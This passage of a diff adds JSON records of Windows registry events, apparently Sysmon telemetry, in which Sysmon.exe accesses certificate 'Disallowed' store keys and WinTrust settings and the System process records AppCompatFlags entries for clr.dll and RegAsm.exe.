"timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll", + "registry_value": "clr.dll", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "registry_value": "RegAsm.exe", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570866530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": 